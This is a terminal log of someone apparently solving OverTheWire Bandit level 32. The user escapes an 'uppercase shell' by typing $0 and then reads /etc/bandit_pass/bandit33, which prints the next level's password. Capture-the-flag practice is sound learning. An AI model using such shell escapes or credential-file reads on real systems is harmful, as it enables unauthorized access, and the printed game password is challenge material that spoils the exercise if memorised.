aishm@DELL:~$ ssh bandit32@bandit.labs.overthewire.org -p 2220
Connection closed by 51.21.210.216 port 2220
aishm@DELL:~$ ssh -t bandit32@bandit.labs.overthewire.org -p 2220 sh
                         _                     _ _ _
                        | |__   __ _ _ __   __| (_) |_
                        | '_ \ / _` | '_ \ / _` | | __|
                        | |_) | (_| | | | | (_| | | |_
                        |_.__/ \__,_|_| |_|\__,_|_|\__|


                      This is an OverTheWire game server.
            More information on http://www.overthewire.org/wargames

backend: gibson-0
bandit32@bandit.labs.overthewire.org's password:
WELCOME TO THE UPPERCASE SHELL
>> $0
$ echo $0
sh
$ cat /etc/bandit_pass/bandit33
tQdtbs5D5i2vJwkO8mEyYEyTL8izoeJ0
$
